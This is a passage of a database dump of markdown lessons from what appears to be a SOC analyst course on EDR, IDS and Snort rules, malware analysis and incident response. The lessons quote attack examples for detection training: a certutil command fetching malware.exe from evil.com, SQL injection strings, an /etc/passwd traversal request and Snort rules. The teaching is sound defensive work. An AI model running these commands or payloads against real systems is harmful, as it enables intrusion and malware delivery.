(587, 245, '## Suspicious Parent-Child Relationships (The Cheat Sheet)\n\nMemorize these. These are the \"Bread and Butter\" of Tier 1 Analysis. If you see these, you escalate the ticket.\n\n### 1. The \"Office\" Spawners (Macro Malware)\nAttack Vector: Phishing emails with malicious attachments.\n*   **Parent**: `winword.exe`, `excel.exe`, `powerpnt.exe`, `outlook.exe`\n*   **Suspicious Children**:\n    *   `cmd.exe` (Command Prompt)\n    *   `powershell.exe`\n    *   `wscript.exe` / `cscript.exe` (Script engines)\n    *   `mshta.exe` (HTML Apps)\n    *   `rundll32.exe`\n*   **Verdict**: 99.9% Malicious. Office apps handles documents, not system administration.\n\n### 2. The \"Browser\" Spawners (Drive-By Downloads)\nAttack Vector: User visits a bad site, or is tricked into running a fake \"Update\".\n*   **Parent**: `chrome.exe`, `firefox.exe`, `msedge.exe`\n*   **Suspicious Children**:\n    *   `cmd.exe`, `powershell.exe` (Shells)\n    *   `whoami.exe`, `net.exe`, `ipconfig.exe` (Reconnaissance tools)\n*   **Verdict**: High Risk. Browsers should isolate web content. Spawning a shell means the sandbox was broken or the user was tricked.\n\n### 3. The \"Java/Adobe\" Spawners (Exploits)\nAttack Vector: Exploiting vulnerabilities in old PDF readers or Java runtimes.\n*   **Parent**: `acrord32.exe` (Adobe), `java.exe`, `javaw.exe`\n*   **Suspicious Children**:\n    *   `powershell.exe`\n    *   `cmd.exe`\n*   **Verdict**: Malicious.\n\n### 4. The \"LOLBins\" (Living Off The Land)\nAttackers use built-in Windows tools to hide.\n*   **CertUtil.exe**: Meant for certificates. Used by attackers to download files (like `wget`).\n    *   *Suspicious*: `certutil -urlcache -split -f http://evil.com/malware.exe`\n*   **Rundll32.exe**: Meant to run DLLs.\n    *   *Suspicious*: Loading a DLL from a Temp folder or User Profile.\n\n### 5. 
Service Exploitation (Web Servers)\nAttack Vector: Webshells / SQL Injection.\n*   **Parent**: `w3wp.exe` (IIS Web Server), `httpd.exe` (Apache), `tomcat.exe`, `sqlservr.exe`\n*   **Suspicious Children**:\n    *   `cmd.exe`\n    *   `whoami.exe`\n    *   `ping.exe`\n*   **Logic**: Your Web Server code (PHP/.NET) executes on the server. If that code spawns a command shell, it means the attacker has injected a command via the website (**Remote Code Execution - RCE**).\n*   **Verdict**: Critical. Server is fully compromised.', 'markdown', 15, '2025-12-26 22:47:08', '2025-12-29 15:05:46'),
(588, 246, '## EDR Market Leaders\n\nJust like SIEM, the EDR market is consolidated around a few major players. You should recognize these names.\n\n### 1. CrowdStrike Falcon\nThe current market leader in enterprise.\n*   **Architecture**: 100% Cloud-native. The sensor on the laptop is extremely lightweight and sends telemetry to the CrowdStrike cloud.\n*   **Features**: Famous for its \"Overwatch\" service (human threat hunters at CrowdStrike who watch your alerts for you).\n*   **UI**: Known for its \"Process Tree\" visualization which set the standard for the industry.\n\n### 2. Microsoft Defender for Endpoint (MDE)\n*   **Advantage**: It is built into Windows 10/11. There is no agent to install; you just flip a switch in the cloud.\n*   **Integration**: Feeds directly into Azure Sentinel (SIEM).\n*   **Capabilities**: went from being a joke (old Windows Defender) to a top-tier Gartner leader. Excellent memory scanning.\n\n### 3. SentinelOne (Singularity)\n*   **Focus**: AI and Automation.\n*   **Feature**: \"Rollback\". If ransomware encrypts your files, SentinelOne can use Windows Shadow Copies to *undo* the encryption and restore the files automatically. This is a huge selling point.\n\n### 4. Carbon Black (VMware/Broadcom)\n*   One of the pioneers of EDR (formerly Bit9).\n*   Very granular control. Often used in high-security environments where you want to whitelist *every single file execution*.\n\n### 5. Cybereason\n*   **Focus**: \"MalOp\" (Malicious Operation). Instead of giving you 50 alerts, it groups them into 1 \"Operation\" to show the full story.\n*   **Visuals**: Very strong visualization of the attack timeline.', 'markdown', 15, '2025-12-26 22:47:08', '2025-12-29 15:05:46'),
(589, 247, '## Module 24 Review\nEDR is your specialized camera for endpoints.\n*   It tracks **Behavior** (Process Trees), not just signatures.\n*   It allows **Live Response** (Shell access, Isolation).\n*   Understanding **Parent-Child relationships** is the #1 skill for EDR analysis.\n\nNext: Intrusion Detection Systems (Network visibility).', 'markdown', 15, '2025-12-26 22:47:08', '2025-12-29 14:17:57'),
(590, 251, '## Intrusion Detection Systems (IDS): The Burglar Alarm\n\nIf EDR protects the endpoint (the house) and SIEM watches the logs (the diary), the **IDS** watches the wire (the roads leading to the house). It analyzes network packets in real-time to find attacks.\n\n### NIDS vs. HIDS\nThere are two main flavors of IDS:\n\n#### 1. Network IDS (NIDS)\n*   **Location**: Sits on the network, usually behind the firewall or plugged into a Switch Span Port (Mirror Port).\n*   **Visibility**: Sees all traffic flowing through that segment.\n*   **Blind Spot**: It cannot see *encrypted* traffic (HTTPS) unless you are doing SSL Decryption (man-in-the-middle). It also can\'t see what happens inside the host (e.g., USB insertion).\n*   **Examples**: Snort, Suricata, Zeek (Bro).\n\n#### 2. Host IDS (HIDS)\n*   **Location**: Installed on the server/laptop itself (Software Agent).\n*   **Visibility**: Sees file changes, log entries, and memory. Crucially, it sees traffic *after* it has been decrypted by the web server.\n*   **Blind Spot**: If the OS is compromised (Rootkit), the HIDS might be disabled or lied to.\n*   **Examples**: OSSEC, Wazuh Agent (which includes HIDS), Tripwire.\n\n### IDS vs. IPS (Detection vs. Prevention)\n*   **IDS (Intrusion Detection System)**:\n    *   **Mode**: Passive.\n    *   **Action**: \"I see an attack. I will send an alert to the SIEM.\"\n    *   **Traffic**: It receives a *copy* of the traffic (Tap). It does not slow down the network.\n*   **IPS (Intrusion Prevention System)**:\n    *   **Mode**: Inline (Active).\n    *   **Action**: \"I see an attack. I am dropping the packet immediately.\"\n    *   **Traffic**: All traffic flows *through* it. If the IPS crashes, the network goes down (unless you have fail-open hardware).\n\n### Why use IDS if we have Firewalls?\n*   **Firewall**: Blocks based on Rules (IP, Port). \"Allow Port 80.\"\n*   **IDS**: Inspects the *content* of the packet on Port 80. 
\"Is this request asking for `index.html` (Good) or is it sending `Union Select 1,2,3...` (SQL Injection)?\"\n\nA Firewall is the Bouncer who checks ID. The IDS is the Security Guard watching the dance floor for fights.', 'markdown', 15, '2025-12-26 22:50:58', '2025-12-29 15:05:57'),
(591, 252, '## Detection Methods: Signatures vs. Anomaly\n\nHow does an IDS know a packet is \"bad\"?\n\n### 1. Signature-Based Detection (The Database)\nThis is the traditional method. The IDS compares packets against a huge database of known attack patterns (Signatures).\n*   **Example**: \"If a packet contains the hex bytes `0x90909090` (NOP Sled), alert.\"\n*   **Pros**:\n    *   Low False Positives (Usually).\n    *   Fast.\n    *   Specific (Tells you exactly what the attack is: \"EternalBlue Exploit\").\n*   **Cons**:\n    *   Can only detect *known* attacks.\n    *   Useless against 0-days (Brand new exploits).\n\n### 2. Anomaly-Based Detection (The Baseline)\nAlso called \"Behavioral\". The IDS learns what \"Normal\" traffic looks like.\n*   **Learning Phase**: \"On Mondays, the Marketing Server sends 50MB of data to the Printer.\"\n*   **Detection**: \"Today (Monday), the Marketing Server sent 50GB of data to an IP in China.\" -> ALERT.\n*   **Pros**:\n    *   Can detect 0-days and unknown attacks (because the behavior is weird).\n*   **Cons**:\n    *   **High False Positives**. (Maybe the Marketing team is doing a backup? Maybe they hired a new guy who works weird hours?).\n    *   Requires a \"Training Period\" where the network must be clean (don\'t train on infected traffic!).\n\n### 3. Protocol Verification\nThe IDS knows how protocols (HTTP, DNS, TCP) *should* work.\n*   **Rule**: \"In HTTP, the Header must end with two newlines.\"\n*   **Attack**: An attacker sends a malformed header to crash the server.\n*   **Detection**: The IDS sees the protocol violation and alerts, even without a specific signature for that specific exploit tool.\n\n### The Modern Approach\nMost modern systems use **Hybrid Detection**. They use Signatures for the easy stuff and Anomaly/ML for the complex stuff.', 'markdown', 15, '2025-12-26 22:50:58', '2025-12-29 15:05:57'),
(592, 253, '## Snort: The Grandfather of IDS\n\n**Snort** (created by Sourcefire, now owned by Cisco) is the de-facto standard for NIDS. Even if you use other tools, you will likely use \"Snort Rules\" because the syntax is universal.\n\n### Snort Architecture\n1.  **Packet Decoder**: Prepares packets for inspection.\n2.  **Preprocessors**: Normalizes traffic (e.g., reassembling fragmented TCP packets so attackers can\'t hide payload by splitting it up).\n3.  **Detection Engine**: The core. Matches packets against rules.\n4.  **Logging/Alerting**: Outputs to a file, Syslog, or Database.\n\n### Snort Rule Syntax (Memorize This!)\nA Snort rule has two parts: The **Header** (Action/Protocol/IPs) and the **Options** (What to look for).\n\n`alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS 80 (msg:\"Possible SQL Injection\"; content:\"UNION SELECT\"; nocase; sid:1000001; rev:1;)`\n\n*   `alert`: The Action. (Could be `drop`, `log`, `pass`).\n*   `tcp`: The Protocol (udp, icmp, ip).\n*   `$EXTERNAL_NET any`: Source IP and Port.\n*   `->`: Direction (One way).\n*   `$HTTP_SERVERS 80`: Destination IP and Port.\n*   `( ... )`: The Options.\n    *   `msg`: What shows up in the alert log.\n    *   `content`: The specific string to search for in the packet payload (\"UNION SELECT\").\n    *   `nocase`: Ignore Case (Select vs sELecT).\n    *   `sid`: Signature ID (Unique number).\n    *   `rev`: Revision number.\n\n### Writing a Custom Rule\nScenario: You want to detect anyone downloading a file named `confidential_salary.xlsx` via HTTP.\n`alert tcp any any -> any any (msg:\"Sensitive File Access\"; content:\"confidential_salary.xlsx\"; http_uri; sid:1000002;)`\n(Note: `http_uri` tells Snort to look only in the URI part of the packet, making it faster).\n\n### Pros and Cons\n*   **Pros**: Universal, massive community rule sets (Emerging Threats - ET Open).\n*   **Cons**: Single-threaded (historically). 
On 10Gbps networks, Snort execution can bottleneck one CPU core while others sit idle. (Snort 3.0 fixes this, but adoption is slow).', 'markdown', 15, '2025-12-26 22:50:58', '2025-12-29 15:05:57'),
(593, 254, '## Suricata: The Multithreaded Powerhouse\n\n**Suricata** (managed by OISF) is the modern competitor to Snort. It uses the same rule syntax (mostly) but was built for speed and deep visibility.\n\n### Key Differences from Snort\n\n#### 1. Multi-Threading\nSuricata is natively multi-threaded. If you put it on a 64-core server, it will use all 64 cores to process traffic. This allows it to handle massive bandwidth (10Gbps, 40Gbps, 100Gbps) that would choke legacy Snort.\n\n#### 2. Protocol Awareness (Application Layer)\nSuricata doesn\'t just look at bytes; it understands the \"App\".\n*   It automatically identifies HTTP, TLS, SMB, FTP, DNS.\n*   Even if you run HTTP on port 8080 (non-standard), Suricata sees the handshake and says \"This is HTTP.\"\n*   **EVE.json**: Suricata produces a rich JSON log file (`eve.json`) that logs metadata for *every* flow, not just alerts.\n    *   *Example*: It logs every TLS certificate exchange. You can investigate \"Self-Signed Certs\" or \"Expired Certs\" effortlessly.\n\n#### 3. File Extraction\nSuricata can automatically carve files out of the stream.\n*   Configuration: `file-store: yes`\n*   Result: If a user downloads a `.exe` or `.pdf`, Suricata can save a copy of that file to disk for the Malware Analysis team to sandbox later.\n\n### Zeek (Formerly Bro)\nWhile talking about Suricata/Snort, we must mention **Zeek**.\n*   **Snort/Suricata** = \"Is this bad?\" (Alerting).\n*   **Zeek** = \"What is happening?\" (Visibility).\nZeek creates transaction logs. 
`conn.log` (all connections), `http.log` (all web requests), `dns.log` (all resolutions).\nIt is less about signatures and more about generating high-quality structured data for your SIEM to hunt through.\n\n### Which one to choose?\n*   **Snort**: If you need lightweight, standard IPS.\n*   **Suricata**: If you have high bandwidth and want metadata (TLS/HTTP info).\n*   **Zeek**: If you want deep forensics and threat hunting capability (often run *alongside* Suricata).', 'markdown', 15, '2025-12-26 22:50:58', '2025-12-29 15:05:57'),
(594, 255, '## Analyzing IDS Alerts\n\nAs an Analyst, you will stare at IDS alerts all day. You need to quickly decide: **True Positive** (Real Attack) or **False Positive** (Noise).\n\n### The Analysis Workflow\n\n#### Step 1: Read the Rule (The \"msg\")\n*   Alert: `ET EXPLOIT Obfuscated JavaScript Exploit Kit Landing Page`\n*   Meaning: An external website tried to run a script to exploit the browser.\n\n#### Step 2: Check the Direction\n*   `External -> Internal`: Attack Attempt.\n*   `Internal -> External`: Compromise/Beaconing/Exfiltration. (These are usually scarier).\n\n#### Step 3: Check the Payload (The Packet Capture)\nMost SIEMs/IDS allow you to view the payload that triggered the alert.\n*   **Context**: Did the payload contain readable text?\n    *   Alert says \"SQL Injection\". Payload contains: `user_id=5`. -> **False Positive**. (5 is normal).\n    *   Alert says \"SQL Injection\". Payload contains: `user_id=1 OR 1=1`. -> **True Positive**.\n\n#### Step 4: Check the Response\nDid the server respond?\n*   **Request**: `GET /../../etc/passwd` (Directory Traversal).\n*   **Response**: `404 Not Found`.\n*   **Verdict**: Attempted attack, but **Failed**. (Low Priority).\n*   **Response**: `200 OK` (Followed by root:x:0:0...).\n*   **Verdict**: **Successful Compromise**. (Critical Priority).\n\n### Common False Positives\n1.  **Vulnerability Scanners**: If your creative team runs Nessus/Qualys, your IDS will light up like a Christmas tree. (Whitelist the Scanner IP).\n2.  **P2P Traffic**: Torrent apps often use strange behavior that looks like scanning.\n3.  **Encrypted Traffic**: Sometimes encrypted bytes coincidentally match a text signature. (e.g., a random string inside a JPEG image matches a \"Base64\" signature).\n\n### The \"Default Deny\" Mindset\nWhen investigating, assume it is real until proved otherwise. \"I think this is a False Positive\" is the last words of many fired analysts. 
Prove it.', 'markdown', 15, '2025-12-26 22:50:58', '2025-12-29 15:05:57'),
(595, 256, '## Module 25 Review\nYou studied:\n*   **NIDS vs HIDS**: Network vs Host.\n*   **Signatures**: The primary method of detection.\n*   **Snort/Suricata**: The tools of the trade.\n*   **Analysis**: Verifying if the alert was a successful attack or just noise.\n\nThis concludes the Detection Engineering section of Path 3.', 'markdown', 15, '2025-12-26 22:50:58', '2025-12-29 14:17:57'),
(596, 261, '## Malware Categories: Know Your Enemy\n\n\"Malware\" is a catch-all term for \"Malicious Software\". However, calling everything a \"Virus\" is like calling every vehicle a \"Car\" (inaccurate when it is a tank or a jet). As an analyst, you must use precise terminology.\n\n### 1. Virus\n*   **Definition**: Code that attaches itself to a legitimate program (host). It cannot run by itself. It needs you to run the host program.\n*   **Behavior**: Replicates by infecting other files.\n*   **Analogy**: A biological virus needs a human cell to reproduce.\n*   **Example**: CIH (Chernobyl), file infectors. *Rare in modern times.*\n\n### 2. Worm\n*   **Definition**: A standalone program that propagates automatically across a network. It does **not** need a host file and does **not** need user interaction.\n*   **Behavior**: Scans the network for vulnerabilities (e.g., SMB exploits), copies itself, and executes.\n*   **Impact**: Can saturate network bandwidth instantly.\n*   **Example**: **WannaCry** (spread via EternalBlue), **Conficker**, **Morris Worm**.\n\n### 3. Trojan Horse\n*   **Definition**: Malware disguised as legitimate software.\n*   **Behavior**: You think you are downloading \"Adobe Photoshop Crack.exe\" or \"Zoom_Installer.exe\". You run it, it installs the app (maybe), but also installs the malware.\n*   **Key**: It relies on **Social Engineering**, not exploits.\n*   **Example**: **Emotet** (often delivered via fake invoices), **Zeus**.\n\n### 4. Ransomware\n*   **Definition**: Malware that encrypts your files and demands payment for the decryption key.\n*   **Behavior**:\n    1.  Infects machine.\n    2.  Contacts C2 server (to generate keys).\n    3.  Encrypts documents (`.docx`, `.jpg`, `.pdf`).\n    4.  
Changes wallpaper to \"YOUR FILES ARE ENCRYPTED\".\n*   **Evolution**: Modern Ransomware (Double Extortion) also *steals* your data before encrypting it, threatening to leak it if you don\'t pay.\n*   **Example**: **Ryuk**, **Conti**, **LockBit**.\n\n### 5. Rootkit\n*   **Definition**: Malware designed to hide its existence. It digs deep into the OS (Kernel level).\n*   **Behavior**: It intercepts System Calls.\n    *   You ask Windows: \"Show me all files in C:\\\\Windows\".\n    *   Windows asks Kernel.\n    *   Rootkit intercepts: \"List files, but remove \'evil.sys\' from the list.\"\n    *   Windows shows you the list. You see nothing.\n*   **Detection**: Extremely difficult from *inside* the running OS, because every answer you get has passed through the rootkit. Usually requires memory forensics, or booting from trusted media and comparing the disk as seen from outside with what the live system reported.\n\n### 6. Spyware / Keylogger\n*   **Definition**: Steals information.\n*   **Behavior**: Records keystrokes (passwords), takes screenshots, activates the webcam.\n*   **Example**: **Pegasus** (Mobile spyware), **Agent Tesla**.\n\n### 7. Cryptominer (Coinminer)\n*   **Definition**: Steals your CPU/GPU power to mine cryptocurrency (Monero).\n*   **Symptoms**: Computer fans spin at 100%, system becomes sluggish.\n*   **Risk**: It proves the attacker has code execution. Today it\'s a miner; tomorrow it could be Ransomware.\n\n### 8. RAT (Remote Access Trojan)\n*   **Definition**: Malware that gives the attacker full remote control (Screen, Mouse, Shell, Files).\n*   **Behavior**: It\'s like TeamViewer for hackers.\n*   **Example**: **NjRAT**, **DarkComet**.\n\n### Review\n*   If it spreads on its own -> **Worm**.\n*   If it looks like a game but isn\'t -> **Trojan**.\n*   If it locks your files -> **Ransomware**.\n*   If it hides in the kernel -> **Rootkit**.', 'markdown', 15, '2025-12-26 22:55:56', '2025-12-29 15:08:46'),
(597, 262, '## Static vs. Dynamic Analysis: Two Roads to Truth\n\nWhen you find a suspicious file (`invoice.exe`), you have two ways to analyze it.\n\n### 1. Static Analysis (The \"Autopsy\")\nExamining the file **without running it**.\nIt is safe, fast, but can be defeated by obfuscation.\n\n*   **What we look for**:\n    *   **Hashes**: SHA256 (plus MD5 only to match older reports). Is this hash already known to VirusTotal?\n    *   **Strings**: ASCII/Unicode text inside the binary.\n        *   Bad: `cmd.exe`, `Powershell -enc`, `http://evil.com/payload`.\n        *   Good: `Copyright Microsoft Corporation`.\n    *   **Imports (PE Headers)**: What Windows functions does this program use?\n        *   `InternetOpenUrl`: Connects to internet.\n        *   `GetKeyState`: Logs keystrokes?\n        *   `CryptEncrypt`: Ransomware?\n    *   **Packers**: Is the code compressed/obfuscated (UPX)?\n\n### 2. Dynamic Analysis (The \"Sandbox\")\nRunning the file in a controlled, isolated environment to see **what it does**.\nIt is dangerous (if it escapes) but shows the true behavior.\n\n*   **What we look for**:\n    *   **Process Activity**: Did it spawn `cmd.exe`?\n    *   **File System**: Did it drop a file in `C:\\\\Temp`?\n    *   **Registry**: Did it add a Run key for persistence?\n    *   **Network**: Did it DNS query `attacker.com`?\n\n### The Hybrid Workflow\nAlways start with Static.\n1.  **Hash it**: Use `sha256sum`. Search VirusTotal *by hash* (do not upload the sample itself unless you are sure it is not sensitive: uploads are shared with every vendor and with paying subscribers, which can tip off a targeted attacker). If it\'s known bad, you are done.\n2.  **Strings it**: Use `strings`. Look for IPs/URLs.\n3.  **PE Analysis**: Use `PEStudio`. Check imports.\n4.  **Sandbox it**: If Static is inconclusive, move to Dynamic. Run it in a VM (Cuckoo/Any.Run) and watch the fireworks.\n\n### Evasion Techniques\n*   **Anti-Static**:\n    *   **Packing**: Compressing the code so \"Strings\" returns garbage. 
The code only unpacks in memory when run.\n    *   **Obfuscation**: Changing variable names (`var a = 1`) to nonsense (`var x8z9 = 1`).\n*   **Anti-Dynamic**:\n    *   **Sleep**: \"Wait 1 hour before doing anything.\" (Sandboxes usually only run for 5 minutes).\n    *   **User Check**: \" Check if the mouse is moving. If not, I am in a sandbox. Do nothing.\"\n    *   **VM Check**: \"Check hardware ID. If it says \'VMware Virtual Disk\', do nothing.\"', 'markdown', 15, '2025-12-26 22:55:56', '2025-12-29 15:08:46'),
(598, 263, '## Setting Up a Safe Malware Lab\n\n**WARNING**: NEVER analyze malware on your host machine or your corporate workstation. One mistake and you infect the network. You need a dedicated, isolated lab.\n\n### 1. The Hypervisor\nYou need virtualization software.\n*   **VirtualBox** (Free, Open Source).\n*   **VMware Workstation** (Standard, robust).\n\n### 2. The Network Isolation (Crucial!)\nYou must ensure the malware cannot talk to your home/work network.\n*   **Host-Only Mode**: The VM can talk to the Host (and other VMs) but **cannot** access the Internet or your LAN.\n*   **Custom vNet**: Create a completely isolated virtual switch.\n*   **Fake Internet**: Use a tool like **INetSim**.\n    *   Malware: \"I want to download bad.exe from evil.com\"\n    *   INetSim: \"I am evil.com! Here is your file.\" (Sends a harmless dummy file).\n    *   *Result*: The malware runs, thinking it has internet, but is safely contained.\n\n### 3. The Analysis VMs\nYou don\'t just need a Windows 10 ISO. You need tools.\n*   **FlareVM (Windows)**: A script by Mandiant. You install a clean Windows VM, run the script, and it installs hundreds of tools (x64dbg, PEStudio, Wireshark, Process Hacker).\n*   **REMnux (Linux)**: A Linux distro built for malware analysis (like Kali, but for reverse engineering). It includes tools to analyze PDF/Office docs, decode scripts, and run INetSim.\n\n### 4. Snapshotting\nThis is the superpower of VMs.\n1.  Install Windows.\n2.  Install Tools.\n3.  Disable Windows Defender (so it doesn\'t delete your samples).\n4.  **TAKE A SNAPSHOT** (Name it: \"Clean State\").\n5.  Infect the VM. Watch it die.\n6.  **Revert to Snapshot**.\n7.  In 10 seconds, you are back to a clean state, ready for the next sample.\n\n### Lab Safety Rules\n1.  **Disconnect**: Verify network adapter is \"Host-Only\" or \"Custom\".\n2.  **No Sharing**: Disable \"Shared Folders\" between Host and Guest.\n3.  **No USB**: Do not plug USB drives into the VM.\n4.  
**VPN**: If you must analyze \"live\" (letting it connect to internet), use a VPN and a \"Burner\" network separate from your company Wi-Fi.', 'markdown', 15, '2025-12-26 22:55:56', '2025-12-29 15:08:46'),
(599, 264, '## Static Analysis Tools: The Surgeon\'s Kit\n\nHere are the essential tools you will use during Static Analysis. Most are free.\n\n### 1. VirusTotal (The First Stop)\n*   **What it is**: A website that scans your file with 70+ Antivirus engines.\n*   **Usage**: Search by hash first. Only upload the file itself if you are certain it contains nothing sensitive: every upload is shared with all vendors and with paying subscribers, and a targeted attacker can watch for their own sample appearing there (it tells them they have been found).\n*   **Verdict**:\n    *   50/70 red: Almost certainly Malware.\n    *   0/70 green: Clean... OR a brand new Zero-Day (or simply never submitted before). A clean VirusTotal result is *not* proof of innocence.\n    *   **Community Tab**: Read comments. Other analysts often post \"This is Emotet dropped via phishing.\"\n\n### 2. Strings\n*   **Command**: `strings file.exe` (Linux) or `strings.exe` (Windows Sysinternals).\n*   **Function**: Extracts printable characters.\n*   **What to hunt**:\n    *   IP Addresses (`1.2.3.4`).\n    *   URLs (`http://...`).\n    *   Filenames (`dropped_malware.exe`).\n    *   Registry Keys (`Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run`).\n    *   Error messages (often reveal the compiler/language).\n\n### 3. PEStudio (Windows)\n*   **Function**: Deep inspection of the Portable Executable (PE) header.\n*   **Key Features**:\n    *   **Indicators**: Highlights suspicious things in red (e.g., \"File has no digital signature\", \"File references a browser\").\n    *   **Imports**: Shows what DLLs/APIs are used.\n    *   **Resources**: Sometimes malware hides a second .exe inside its \"Icon\" or \"Image\" resource section.\n\n### 4. Capa (Mandiant)\n*   **Function**: \"What does this do?\" using rules.\n*   **Output**: Instead of showing you assembly code, it says:\n    *   \"Capability: Encrypts Data using AES\"\n    *   \"Capability: Connects to HTTP\"\n    *   \"Capability: Takes Screenshot\"\n*   It\'s like Google Translate for Assembly code.\n\n### 5. 
PEiD / Detect It Easy (DiE)\n*   **Function**: Detects **Packers**.\n*   **Scenario**: You run `strings` and see random garbage.\n*   **DiE says**: \"Packed with UPX\".\n*   **Action**: You know you must unpack it (using `upx -d` or manual unpacking) before you can analyze it.', 'markdown', 15, '2025-12-26 22:55:56', '2025-12-29 15:08:46'),
(600, 265, '## Dynamic Analysis (Sandboxing)\n\nWhen Static Analysis hits a wall (obfuscation), we detonate the bomb in a box.\n\n### 1. Automated Sandboxes (Cuckoo / Cuckoo-Modified)\n*   **Concept**: You submit a file. The system spins up a VM, runs the file, records everything for 5 minutes, kills the VM, and gives you a report.\n*   **The Report**:\n    *   **Screenshots**: Did it pop up a Ransomware note?\n    *   **Network**: PCAPs of traffic.\n    *   **Dropped Files**: Copies of any files it created.\n    *   **API Calls**: Every interaction with Windows.\n\n### 2. Interactive Analysis (Any.Run)\n*   **Concept**: A web-based sandbox where *you* interact with the VM.\n*   **Scenario**: The malware is a Word Doc that says \"Click Enable Content\".\n    *   In Cuckoo, no one clicks it, so nothing happens.\n    *   In Any.Run, you watch the screen, you click \"Enable Content\", and BAM, the malware runs. You see the process tree explode in real-time.\n*   **Pros**: instant visibility, handles user-interaction triggers.\n\n### 3. Monitoring Tools (Manual Sandbox)\nIf you are running the malware in your own FlareVM:\n*   **Process Hacker**: Task Manager on steroids. Shows parent-child trees, memory strings, and coloring for packed processes.\n*   **Procmon (Process Monitor)**: The holy grail. Records *every* File System, Registry, and Process event.\n    *   *Tip*: It generates millions of events. Filter is your friend. `ProcessName is evil.exe`.\n*   **Regshot**:\n    1.  Take \"Shot 1\" (Registry before malware).\n    2.  Run Malware.\n    3.  Take \"Shot 2\".\n    4.  Compare. It shows you exactly what registry keys were added (Persistence).\n*   **Fiddler / Wireshark**: Capture the network traffic. 
Fiddler is great for decrypting HTTPS if you install its root cert (install it only inside the analysis VM, never on your host; a sample that pins its C2 certificate will simply refuse to connect through the proxy).\n\n### Indicators of Compromise (IOCs)\nThe goal of Dynamic analysis is to extract IOCs to put into your SIEM/EDR.\n*   **Network IOCs**: C2 IPs, Domains, URLs to block.\n*   **Host IOCs**: File Hashes, Mutex names, Registry keys, Filenames.\n*   **Behavioral IOCs**: \"Powershell.exe connecting to the internet\".', 'markdown', 15, '2025-12-26 22:55:56', '2025-12-29 15:08:46'),
(601, 266, '## Identifying IOCs from Malware\n\nYou\'ve analyzed the malware. You have pages of notes. Now, what do you do? You need to extract **Actionable Intelligence**.\n\n### The Pyramid of Pain\nNot all IOCs are equal. David Bianco\'s \"Pyramid of Pain\" describes how much pain you cause an attacker when you detect and deny each kind of indicator, and therefore how hard they have to work to keep operating.\n\n#### 1. Hash Values (Bottom - Trivial)\n*   **What**: MD5/SHA256 of the file.\n*   **Attacker Effort**: Trivial. Change 1 byte, hash changes.\n*   **Value**: Low. Only catches that *one* specific file. Block by hash as a stopgap, not as your detection strategy.\n\n#### 2. IP Addresses (Easy)\n*   **What**: C2 Server IP.\n*   **Attacker Effort**: Easy. Change IP using a Proxy/VPN.\n*   **Value**: Low/Medium. IPs serve many domains, and blocking a shared cloud/CDN address can break legitimate services.\n\n#### 3. Domain Names (Simple)\n*   **What**: `evil.com`.\n*   **Attacker Effort**: Simple. Register a new domain (`evil2.com`).\n*   **Value**: Medium. Requires money/time for attacker.\n\n#### 4. Network/Host Artifacts (Annoying)\n*   **What**: User-Agent strings, specific registry keys, distinctive filename patterns.\n*   **Attacker Effort**: Annoying. They have to rewrite their tooling or its configuration.\n*   **Value**: High. Catches the *tool*.\n\n#### 5. Tools (Challenging)\n*   **What**: Detecting the tool itself (e.g., Cobalt Strike beacon) regardless of config.\n*   **Attacker Effort**: Challenging. They have to write a new tool from scratch.\n\n#### 6. TTPs (Top - Tough)\n*   **What**: Tactics, Techniques, and Procedures. (Behavior).\n*   **Example**: \"Pass-the-Hash\", \"Spearphishing with Macros\".\n*   **Attacker Effort**: Tough. They have to learn a whole new way of hacking.\n*   **Value**: **Highest**. If you detect \"Pass-the-Hash\", you catch them no matter what tool they use.\n\n### Creating the Report\nYour Malware Analysis Report should contain:\n1.  **Executive Summary**: \"This is ransomware. It spreads via SMB. Risk is Critical.\"\n2.  
**Technical Details**:\n    *   Packer used.\n    *   Compilation timestamp (easily forged in the PE header; treat it as a hint, not evidence).\n    *   Capabilities.\n3.  **IOC List (The \"Blocklist\")**:\n    *   `Hash (SHA-256): <the full 64-hex-digit hash of the sample>` (always give the complete hash and the algorithm; a truncated or wrong one is useless to whoever has to block it, and note that `e3b0c442...` in particular is the SHA-256 of *empty* input, so blocking it would flag every zero-byte file).\n    *   `Domain: update-microsoft-support.com`\n    *   `IP: 192.0.2.1`\n    *   `File: C:\\\\Windows\\\\Temp\\\\winlogon_update.exe`\n4.  **YARA Rules**: A way to describe the malware pattern to hunt for it across the organization.', 'markdown', 15, '2025-12-26 22:55:56', '2025-12-29 15:08:46'),
(602, 267, '## Module 26 Review\nYou learned:\n1.  **Malware Types**: Ransomware vs RAT vs Worm.\n2.  **Static**: Reading strings and hashes.\n3.  **Dynamic**: Detonating in a sandbox.\n4.  **IOCs**: The output of your analysis used to protect the network.\n\nNext: How to handle the incident when the malware detection fires (Incident Response).', 'markdown', 15, '2025-12-26 22:55:56', '2025-12-29 14:19:16'),
(603, 271, '## What is Incident Response?\n\n**Incident Response (IR)** is the structured approach to addressing and managing the aftermath of a security breach or cyberattack. The goal is to handle the situation in a way that limits damage and reduces recovery time and costs.\n\n### Incident vs. Event\n*   **Event**: Any observable occurrence in a system.\n    *   *Example*: User login, firewall deny, file creation.\n    *   *Count*: Millions per day.\n*   **Alert**: An event that triggers a warning based on a rule.\n    *   *Example*: 10 Failed logins.\n*   **Incident**: A violation of security policies that threatens CIA (Confidentiality, Integrity, Availability).\n    *   *Example*: Data breach, Malware infection, Denial of Service.\n    *   *Count*: Hopefully rare.\n\n### Why do we need a Process?\nWhen a breach happens, panic sets in.\n*   \"Pull the plug!\"\n*   \"Wipe the server!\"\n*   \"Call the police!\"\n*   \"Don\'t tell anyone!\"\nWithout a plan, people make mistakes. They destroy evidence (rebooting wipes memory). They tip off the attacker. They violate legal requirements.\nIR is about **Organized Chaos Control**.\n\n### The Computer Security Incident Response Team (CSIRT)\nThe team responsible for IR.\n*   **Technical**: SOC Analysts, Forensics Experts, Malware Engineers.\n*   **Non-Technical**:\n    *   **Legal**: \"Do we have to notify the government? The customers?\"\n    *   **PR/Comms**: \"What do we tell the press?\"\n    *   **HR**: \"Was it an insider? Do we fire them?\"\n    *   **Management**: Approves decisions (e.g., \"Shut down the ecommerce site\").\n\n### The Goal of IR\n1.  **Contain**: Stop the bleeding.\n2.  **Eradicate**: Remove the infection.\n3.  **Recover**: Get back to business.\n4.  **Learn**: Don\'t let it happen again.', 'markdown', 15, '2025-12-26 23:03:48', '2025-12-29 15:08:46'),
